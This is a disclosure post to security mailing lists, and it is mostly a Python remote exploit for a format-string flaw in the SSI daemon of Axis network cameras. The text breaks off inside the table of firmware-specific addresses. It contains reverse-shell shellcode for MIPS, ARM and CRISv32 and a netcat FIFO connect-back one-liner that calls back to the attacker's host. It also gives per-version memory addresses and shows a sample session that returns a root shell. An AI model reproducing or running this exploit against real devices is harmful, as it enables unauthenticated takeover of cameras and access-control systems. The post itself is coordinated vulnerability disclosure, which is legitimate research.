[Remote Format String Exploit] Axis Communications MPQT/PACS Server- Side Include (SSI) Daemon

From: bashis <mcw@noemail.eu>
To: fulldisclosure@seclists.org <fulldisclosure@seclists.org>,bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Cc:
Subject: [Remote Format String Exploit] Axis Communications MPQT/PACS Server- Side Include (SSI) Daemon
Date:



#!/usr/bin/env python2.7
# 
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
# Research and development by bashis <mcw noemail eu> 2016
#
# This format string vulnerability has following characteristic:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output the remote attacker)(*)
# - Remotly exploitable (As anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
#
# This exploit has following characteristic:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
#   - "One-Write-Where-And-What" for MIPS and CRISv32
#     Using "Old Style" POP's
#     Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
#     Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
#   - "Two-Write-Where-And-What" for ARM
#     1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address
#     2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write
#     [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually]
# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>
# <BODY><H1>500 Server Error</H1>
# The server encountered an internal error and could not complete your request.
# </BODY></HTML>
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
# <CRITICAL> Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10
# <CRITICAL> Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.
# ---
#
# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1.  Direct addressing with %<argument>$%n is "delayed", and comes in force only after disconnect.
#     Old metod with POP's coming into force instantly
#
# 2.  Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)
#     - Would be interesting to investigate why.
#
# 3.  Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26
#     Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
#     Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
#     Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4.  Everything is randomized, except heap.
#
# 5.  My initial attempts to use ROP's was not good, as I didn't want to create
#     one unique FMS key by testing each single firmware version, and using ROP with FMS
#     on heap seems pretty complicated as there is one jump availible, maximum two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.
#    
# 6.  Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS excecuted on heap
#
# 7.  Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
#     so execute shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,
#     and re-compile of the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
#
# 8.  This exploit are pretty well documented, more details can be extracted by reading
#     the code and comments.
#
# MIPS ssid maps
# 00400000-0040d000 r-xp 00000000 00:01 2272       /bin/ssid
# 0041d000-0041e000 rw-p 0000d000 00:01 2272       /bin/ssid
# 0041e000-00445000 rwxp 00000000 00:00 0          [heap]
#
# ARM ssid maps
# 00008000-00014000 r-xp 00000000 00:01 2055        /bin/ssid
# 0001c000-0001d000 rw-p 0000c000 00:01 2055        /bin/ssid
# 0001d000-00044000 rw-p 00000000 00:00 0           [heap]
#
# Crisv32 ssid maps
# 00080000-0008c000 r-xp 00000000 1f:03 115        /bin/ssid
# 0008c000-0008e000 rw-p 0000a000 1f:03 115        /bin/ssid
# 0008e000-000b6000 rwxp 0008e000 00:00 0          [heap]
#
# General notes:
#
# When the vul daemon process is exploited, and after popping root connect-back shell,
# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,
# when the main process are fully alive again, I can enjoy the shell, and everybody else can
# enjoy of the camera - that should make all of us happy ;)
# During exploiting, logs says almost nothing, only that the main process restarted.
# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)
#
# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),
# after ssid cannot verify the user, free() are the closest function to be called after
# vsyslog(), needed and perfect to use for jumping.
# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.
# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.
#
# Quite surprised to see so many different devices and under one major release version,
# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version.
#
# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor,  
# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password.    
#
# - No hardcoded login/password that could easily be found in firmware/software files.    
# - Extremely hard to find without local access (and find out what to trigger for opening the door)
# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version."
#   (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)
#
# Note:
# I don't say that Axis Communication has made this hidden format string by this purpose.
# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon,    
# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().
#
# Vulnerable and exploitable products
#
# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,
# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,
# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,
# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,
# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,
# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,
# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,
# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,
# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,
# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,
# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,
# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,
# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,
# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,
# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,
# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more
#
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
#
# Firmware versions vulnerable to the SSI FMS exploit
#
# ('V.Vx' == The FMS key used in this exploit)
#
# Firmware       Introduced      CRISv32         MIPS            ARM (no exec heap from >5.20.x)
# 5.00.x       2008            -               -               no
# 5.01.x 2008            no              -               no
# 5.02.x 2008            no              -               -
# 5.05.x  2009            no              -               -
# 5.06.x  2009            no              -               -
# 5.07.x  2009            no              -               no
# 5.08.x 2010            no              -               -
# 5.09.x  2010            no              -               -
# 5.10.x  2009            no              -               -
# 5.11.x  2010            no              -               -
# 5.12.x  2010            no              -               -
# 5.15.x  2010            no              -               -
# 5.16.x  2010            no              -               -
# 5.20.x  2010-2011       5.2x            -               5.2x
# 5.21.x       2011            5.2x            -               5.2x
# 5.22.x       2011            5.2x            -               -
# 5.25.x  2011            5.2x            -               -
# 5.40.x  2011            5.4x            5.4x            5.4x
# 5.41.x       2012            5.4x            -               -
# 5.50.x  2013            5.5x            5.5x            5.4x
# 5.51.x       2013            -               5.4x            -
# 5.55.x  2013            -               5.5x            5.5x
# 5.60.x       2014            -               5.6x            5.6x
# 5.65.x       2014-2015       -               5.6x            -
# 5.70.x  2015            -               5.7x            -
# 5.75.x  2015            -               5.7x            5.7x
# 5.80.x       2015            -               5.8x            5.8x
# 5.81.x       2015            -               5.8x            -
# 5.85.x  2015            -               5.8x            5.8x
# 5.90.x       2015            -               5.9x            -
# 5.95.x  2016            -               5.9x            5.8x
# 6.10.x       2016            -               6.1x            -
# 6.15.x  2016            -               -               6.1x
# 6.20.x       2016            -               6.2x            -
#
# Vendor URL's of still supported and affected products
#
# http://www.axis.com/global/en/products/access-control
# http://www.axis.com/global/en/products/video-encoders
# http://www.axis.com/global/en/products/network-cameras
# http://www.axis.com/global/en/products/audio
#
# Axis Product Security
#
# product-security@axis.com
# http://www.axis.com/global/en/support/product-security
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
# http://www.axis.com/global/en/support/faq/FAQ116268
#
# Timetable
#
# - Research and Development: 06/01/2016 - 01/06/2016
# - Sent vulnerability details to vendor: 05/06/2016
# - Vendor responce received: 06/06/2016
# - Vendor ACK of findings received: 07/06/2016
# - Vendor sent verification image: 13/06/2016
# - Confirmed that exploit do not work after vendors correction: 13/06/2016
# - Vendor informed about their service release(s): 29/06/2016
# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016
# - Full Disclosure: 18/07/2016
#
# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>"
#
# Have a nice day
# /bashis
#
#####################################################################################

import sys
import string
import socket
import time
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import re


class do_FMS:

#       POP = "%8x"           # Old style POP's with 8 bytes per POP
        POP = "%1c"           # Old style POP's with 1 byte per POP
 WRITElln = "%lln"     # Write 8 bytes
    WRITEn = "%n"         # Write 4 bytes
    WRITEhn = "%hn"               # Write 2 bytes
    WRITEhhn = "%hhn"     # Write 1 byte

        def __init__(self,targetIP,verbose):
               self.targetIP = targetIP
           self.verbose = verbose
             self.fmscode = ""

   # Mostly used internally in this function
  def Add(self, data):
               self.fmscode += data

  # 'New Style' Double word (8 bytes)
      def AddDirectParameterLLN(self, ADDR):
             self.Add('%')
            self.Add(str(ADDR))
                self.Add('$lln')

    # 'New Style' Word (4 bytes)
     def AddDirectParameterN(self, ADDR):
               self.Add('%')
            self.Add(str(ADDR))
                self.Add('$n')

      # 'New Style' Half word (2 bytes)
        def AddDirectParameterHN(self, ADDR):
              self.Add('%')
            self.Add(str(ADDR))
                self.Add('$hn')

     # 'New Style' One Byte (1 byte)
  def AddDirectParameterHHN(self, ADDR):
             self.Add('%')
            self.Add(str(ADDR))
                self.Add('$hhn')

    # Addressing
       def AddADDR(self, ADDR):
           self.Add('%')
            self.Add(str(ADDR))
                self.Add('u')

       # 'Old Style' POP
        def AddPOP(self, size):
            if size != 0:
                      self.Add(self.POP * size)

     # Normally only one will be sent, multiple is good to quick-check for any FMS
      #
  # 'Old Style' Double word (8 bytes)
      def AddWRITElln(self, size):
                       self.Add(self.WRITElln * size)

        # 'Old Style' Word (4 bytes)
     def AddWRITEn(self, size):
                 self.Add(self.WRITEn * size)

  # 'Old Style' Half word (2 bytes)
        def AddWRITEhn(self, size):
                        self.Add(self.WRITEhn * size)

 # 'Old Style' One byte (1 byte)
  def AddWRITEhhn(self, size):
                       self.Add(self.WRITEhhn * size)

        # Return the whole FMS string
      def FMSbuild(self):
                return self.fmscode

class HTTPconnect:

       def __init__(self, host, proto, verbose, creds, noexploit):
                self.host = host
           self.proto = proto
         self.verbose = verbose
             self.credentials = creds
           self.noexploit = noexploit
 
   # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc..
     def RAW(self, uri):
                # Connect-timeout in seconds
               timeout = 5
                socket.setdefaulttimeout(timeout)
          
           s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
              s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            tmp = self.host.split(':')
               HOST = tmp[0]
              PORT = int(tmp[1])
         if self.verbose:
                   print "[Verbose] Sending to:", HOST
                      print "[Verbose] Port:", PORT
                    print "[Verbose] URI:",uri
               s.connect((HOST, PORT))
            s.send("GET %s HTTP/1.0\r\n\r\n" % uri)
          html = (s.recv(4096)) # We really do not care whats coming back
#           if html:
#                  print "[i] Received:",html
               s.shutdown(3)
              s.close()
          return html


      def Send(self, uri):

          # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually
              # matter for the functionality of this exploit, only for future references.
                headers = { 
                       'User-Agent' : 'MSIE',
         }

             # Connect-timeout in seconds
               timeout = 5
                socket.setdefaulttimeout(timeout)

             url = '%s://%s%s' % (self.proto, self.host, uri)

            if self.verbose:
                   print "[Verbose] Sending:", url

             if self.proto == 'https':
                        if hasattr(ssl, '_create_unverified_context'):
                           print "[i] Creating SSL Default Context"
                         ssl._create_default_https_context = ssl._create_unverified_context

            if self.credentials:
                       Basic_Auth = self.credentials.split(':')
                 if self.verbose:
                           print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
                        try:
                               pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
                                pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
                              auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
                               opener = urllib2.build_opener(auth_handler)
                                urllib2.install_opener(opener)
                     except Exception as e:
                             print "[!] Basic Auth Error:",e
                          sys.exit(1)

           if self.noexploit and not self.verbose:
                    print "[<] 204 Not Sending!"
                        html =  "Not sending any data"
           else:
                      data = None
                        req = urllib2.Request(url, data, headers)
                  rsp = urllib2.urlopen(req)
                 if rsp:
                            print "[<] %s OK" % rsp.code
                                html = rsp.read()
          return html


class shellcode_db:

 def __init__(self,targetIP,verbose):
               self.targetIP = targetIP
           self.verbose = verbose

        def sc(self,target):
               self.target = target


# Connect back shellcode
#
# CRISv32: Written by myself, no shellcode availible out on "The Internet"
# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators
# MIPSel: Written by Jacob Holcomb (url encoded by me)
# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php
#
             # Slightly modified syscall's
         MIPSel = string.join([
             #close stdin
               "%ff%ff%04%28" #slti  a0,zero,-1
         "%a6%0f%02%24" #li    v0,4006
            "%4c%f7%f7%03" #syscall       0xdfdfd
            #close stdout
              "%11%11%04%28" #slti  a0,zero,4369
               "%a6%0f%02%24" #li    v0,4006
            "%4c%f7%f7%03" #syscall 0xdfdfd
          #close stderr
              "%fd%ff%0c%24" #li    t4,-3
              "%27%20%80%01" #nor   a0,t4,zero
         "%a6%0f%02%24" #li    v0,4006
            "%4c%f7%f7%03" #syscall 0xdfdfd
          # socket AF_INET (2)
               "%fd%ff%0c%24" #li    t4,-3
              "%27%20%80%01" #nor   a0,t4,zero
         "%27%28%80%01" #nor   a1,t4,zero
         "%ff%ff%06%28" #slti  a2,zero,-1
         "%57%10%02%24" #li    v0,4183
            "%4c%f7%f7%03" #syscall 0xdfdfd
          #
          "%ff%ff%44%30" # andi $a0, $v0, 0xFFFF
           #
          # dup2 stdout
              "%c9%0f%02%24" #li    v0,4041
            "%4c%f7%f7%03" #syscall 0xdfdfd
          #
          # dup2 stderr
              "%c9%0f%02%24" #li    v0,4041
            "%4c%f7%f7%03" #syscall 0xdfdfd
          #
          # Port
             "PP1PP0%05%3c"
           "%01%ff%a5%34"
           #
          "%01%01%a5%20" #addi  a1,a1,257
          "%f8%ff%a5%af" #sw    a1,-8(sp)
          #
          # IP
               "IP3IP4%05%3c"
           "IP1IP2%a5%34"
           #
          "%fc%ff%a5%af" #sw    a1,-4(sp)
          "%f8%ff%a5%23" #addi  a1,sp,-8
           "%ef%ff%0c%24" #li    t4,-17
             "%27%30%80%01" #nor   a2,t4,zero
         "%4a%10%02%24" #li    v0,4170
            "%4c%f7%f7%03" #syscall 0xdfdfd
          #
          "%62%69%08%3c" #lui   t0,0x6962
          "%2f%2f%08%35" #ori   t0,t0,0x2f2f
               "%ec%ff%a8%af" #sw    t0,-20(sp)
         "%73%68%08%3c" #lui   t0,0x6873
          "%6e%2f%08%35" #ori   t0,t0,0x2f6e
               "%f0%ff%a8%af" #sw    t0,-16(sp
          "%ff%ff%07%28" #slti  a3,zero,-1
         "%f4%ff%a7%af" #sw    a3,-12(sp)
         "%fc%ff%a7%af" #sw    a3,-4(sp
           "%ec%ff%a4%23" #addi  a0,sp,-20
          "%ec%ff%a8%23" #addi  t0,sp,-20
          "%f8%ff%a8%af" #sw    t0,-8(sp)
          "%f8%ff%a5%23" #addi  a1,sp,-8
           "%ec%ff%bd%27" #addiu sp,sp,-20
          "%ff%ff%06%28" #slti  a2,zero,-1
         "%ab%0f%02%24" #li    v0,4011 (execve)
           "%4c%f7%f7%03" #syscall 0xdfdfd
          ], '')        

              # Working netcat shell
             # - $PATH will locate 'mkfifo', 'nc' and 'rm'
                # - LHOST / LPORT will be changed on the fly later in the code
             # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting
               # - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]
         # $ echo -n "$IFS" | hexdump -C
          # 00000000  20 09 0a
               # - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c]
          #
          # '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator
            #
          # Working with Apache and Boa
#             NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1"
                NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1"

          ARMel = string.join([
              # original: http://shell-storm.org/shellcode/files/shellcode-754.php
               # 32-bit instructions, enter thumb mode
            "%01%10%8f%e2"        # add r1, pc, #1
           "%11%ff%2f%e1"        # bx r1

               # 16-bit thumb instructions follow
         #
          # socket(2, 1, 0)
          "%02%20"      #mov     r0, #2
            "%01%21"      #mov     r1, #1
            "%92%1a"      #sub     r2, r2, r2
                "%0f%02"      #lsl     r7, r1, #8
                "%19%37"      #add     r7, r7, #25
               "%01%df"      #svc     1
         #
          # connect(r0, &addr, 16)
              "%06%1c"      #mov     r6, r0
            "%08%a1"      #add     r1, pc, #32
               "%10%22"      #mov     r2, #16
           "%02%37"      #add     r7, #2
            "%01%df"      #svc     1
         #
          # dup2(r0, 0/1/2)
          "%3f%27"      #mov     r7, #63
           "%02%21"      #mov     r1, #2
            #
          #lb:
               "%30%1c"      #mov     r0, r6
            "%01%df"      #svc     1
         "%01%39"      #sub     r1, #1
            "%fb%d5"      #bpl     lb
                #
          # execve("/bin/sh", ["/bin/sh", 0], 0)
         "%05%a0"      #add     r0, pc, #20
               "%92%1a"      #sub     r2, r2, r2
                "%05%b4"      #push    {r0, r2}
          "%69%46"      #mov     r1, sp
            "%0b%27"      #mov     r7, #11
           "%01%df"      #svc     1
         #
          "%c0%46"      # .align 2 (NOP)
           "%02%00"      # .short 0x2            (struct sockaddr)
          "PP1PP0"      # .short 0x3412         (port: 0x1234)
             "IP1IP2IP3IP4"        #.byte 192,168,57,1     (ip: 192.168.57.1)
         # .ascii "/bin/sh\0\0"
           "%2f%62%69%6e"        # /bin
             "%2f%73%68%00%00"     # /sh\x00\x00
              "%00%00%00%00"
           "%c0%46"
         ], '')        


         # Connect-back shell for Axis CRISv32
              # Written by mcw noemail eu 2016
           #
          CRISv32 = string.join([
            #close(0)
          "%7a%86"              # clear.d r10 
             "%5f%9c%06%00"                # movu.w 0x6,r9
            "%3d%e9"              # break 13
         #close(1)
          "%41%a2"              # moveq 1,r10
              "%5f%9c%06%00"                # movu.w 0x6,r9
            "%3d%e9"              # break 13
         #close(2)
          "%42%a2"              # moveq 2,r10
              "%5f%9c%06%00"                # movu.w 0x6,r9
            "%3d%e9"              # break 13
         #
          "%10%e1"              # addoq 16,sp,acr
          "%42%92"              # moveq 2,r9
               "%df%9b"              # move.w r9,[acr]
          "%10%e1"              # addoq 16,sp,acr
          "%02%f2"              # addq 2,acr
               #PORT
              "%5f%9ePP1PP0"                # move.w 0xPP1PP0,r9 #
             "%df%9b"              # move.w r9,[acr]
          "%10%e1"              # addoq 16,sp,acr
          "%6f%96"              # move.d acr,r9
            "%04%92"              # addq 4,r9
                #IP
                "%6f%feIP1IP2IP3IP4"  # move.d IP4IP3IP2IP1,acr
          "%e9%fb"              # move.d acr,[r9]
          #
          #socket()
          "%42%a2"              # moveq 2,r10
              "%41%b2"              # moveq 1,r11
              "%7c%86"              # clear.d r12
              "%6e%96"              # move.d $sp,$r9
           "%e9%af"              # move.d $r10,[$r9+]
               "%e9%bf"              # move.d $r11,[$r9+]
               "%e9%cf"              # move.d $r12,[$r9+]
               "%41%a2"              # moveq 1,$r10
             "%6e%b6"              # move.d $sp,$r11
          "%5f%9c%66%00"                # movu.w 0x66,$r9
          "%3d%e9"              # break 13
         #
          "%6a%96"              # move.d $r10,$r9
          "%0c%e1"              # addoq 12,$sp,$acr
                "%ef%9b"              # move.d $r9,[$acr]
                "%0c%e1"              # addoq 12,$sp,$acr
                "%6e%96"              # move.d $sp,$r9
           "%10%92"              # addq 16,$r9
              "%6f%aa"              # move.d [$acr],$r10
               "%69%b6"              # move.d $r9,$r11
          "%50%c2"              # moveq 16,$r12
            #
          # connect()
                "%6e%96"              # move.d $sp,$r9
           "%e9%af"              # move.d $r10,[$r9+]
               "%e9%bf"              # move.d $r11,[$r9+]
               "%e9%cf"              # move.d $r12,[$r9+]
               "%43%a2"              # moveq 3,$r10
             "%6e%b6"              # move.d $sp,$r11
          "%5f%9c%66%00"                # movu.w 0x66,$r9 
         "%3d%e9"              # break 13
         # dup(0) already in socket
         #dup(1)
            "%6f%aa"              # move.d [$acr],$r10
               "%41%b2"              # moveq 1,$r11
             "%5f%9c%3f%00"                # movu.w 0x3f,$r9
          "%3d%e9"              # break 13
         #
          #dup(2)
            "%6f%aa"              # move.d [$acr],$r10
               "%42%b2"              # moveq 2,$r11
             "%5f%9c%3f%00"                # movu.w 0x3f,$r9
          "%3d%e9"              # break 13
         #
          #execve("/bin/sh",NULL,NULL)
             "%90%e2"              # subq 16,$sp
              "%6e%96"              # move.d $sp,$r9
           "%6e%a6"              # move.d $sp,$10
           "%6f%0e%2f%2f%62%69"  # move.d 69622f2f,$r0
              "%e9%0b"              # move.d $r0,[$r9]
         "%04%92"              # addq 4,$r9
               "%6f%0e%6e%2f%73%68"  # move.d 68732f6e,$r0
              "%e9%0b"              # move.d $r0,[$r9]
         "%04%92"              # addq 4,$r9
               "%79%8a"              # clear.d [$r9]
            "%04%92"              # addq 4,$r9
               "%79%8a"              # clear.d [$r9]
            "%04%92"              # addq 4,$r9
               "%e9%ab"              # move.d $r10,[$r9]
                "%04%92"              # addq 4,$r9
               "%79%8a"              # clear.d [$r9]
            "%10%e2"              # addq 16,$sp
              "%6e%f6"              # move.d $sp,$acr
          "%6e%96"              # move.d $sp,$r9
           "%6e%b6"              # move.d $sp,$r11
          "%7c%86"              # clear.d $r12
             "%4b%92"              # moveq 11,$r9
             "%3d%e9"              # break 13
                 ], '')        


         if self.target == 'MIPSel':
                      return MIPSel
              elif self.target == 'ARMel':
                     return ARMel
               elif self.target == 'CRISv32':
                   return CRISv32
             elif self.target == 'NCSH1':
                     return NCSH
                elif self.target == 'NCSH2':
                     return NCSH
                else:
                      print "[!] Unknown shellcode! (%s)" % str(self.target)
                   sys.exit(1)


class FMSdb:

        def __init__(self,targetIP,verbose):
               self.targetIP = targetIP
           self.verbose = verbose

        def FMSkey(self,target):
           self.target = target

          target_db = {

#-----------------------------------------------------------------------
# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)
#-----------------------------------------------------------------------

#
# Using POP format string, AKA 'Old Style'
#
              # MPQT
             'MIPS-5.85.x':         [
                         0x41f370,       # Adjust to GOT free() address
                             0x420900,       # .bss shellcode address
                           2,              # 1st POP's
                           2,              # 2nd POP's
                           'axi',                # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-5.40.3': [
                         0x41e41c,       # Adjust to GOT free() address
                             0x4208cc,       # .bss shellcode address
                           7,              # 1st POP's
                           11,             # 2nd POP's
                           'ax',         # Aligns injected code
                             450,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-5.4x': [        
                           0x41e4cc,       # Adjust to GOT free() address
                             0x42097c,       # .bss shellcode address
                           7,              # 1st POP's
                           11,             # 2nd POP's
                           'ax',         # Aligns injected code
                             450,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-5.5x': [
                           0x41d11c,       # Adjust to GOT free() address
                             0x41f728,       # .bss shellcode address
                           5,              # 1st POP's
                           15,             # 2nd POP's
                           'axis',               # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-5.55x': [       
                           0x41d11c,       # Adjust to GOT free() address
                             0x41f728,       # .bss shellcode address
                           11,             # 1st POP's
                           9,              # 2nd POP's
                           'axis',               # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # Shared with MPQT and PACS
                'MIPS-5.6x': [        
                           0x41d048,       # Adjust to GOT free() address
                             0x41f728,       # .bss shellcode address
                           5,              # 1st POP's
                           15,             # 2nd POP's
                           'axis',               # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type

              ],

            # MPQT
             'MIPS-5.7x': [        
                           0x41d04c,       # Adjust to GOT free() address
                             0x41f718,       # .bss shellcode address
                           2,              # 1st POP's
                           14,             # 2nd POP's
                           'axis',               # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-5.75x': [
                          0x41c498,       # Adjust to GOT free() address
                             0x41daf0,       # .bss shellcode address
                           3,              # 1st POP's
                           13,             # 2nd POP's
                           'axi',                # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # Shared with MPQT and PACS
                'MIPS-5.8x': [
                           0x41d0c0,       # Adjust to GOT free() address
                             0x41e740,       # .bss shellcode address
                           3,              # 1st POP's
                           13,             # 2nd POP's
                           'axi',                # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-5.9x': [ 
                          0x41d0c0,       # Adjust to GOT free() address
                             0x41e750,       # .bss shellcode address
                           3,              # 1st POP's
                           13,             # 2nd POP's
                           'axi',                # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-6.1x': [
                           0x41c480,       # Adjust to GOT free() address
                             0x41dac0,       # .bss shellcode address
                           3,              # 1st POP's
                           13,             # 2nd POP's
                           'axi',                # Aligns injected code
                             700,            # How big buffer before shellcode
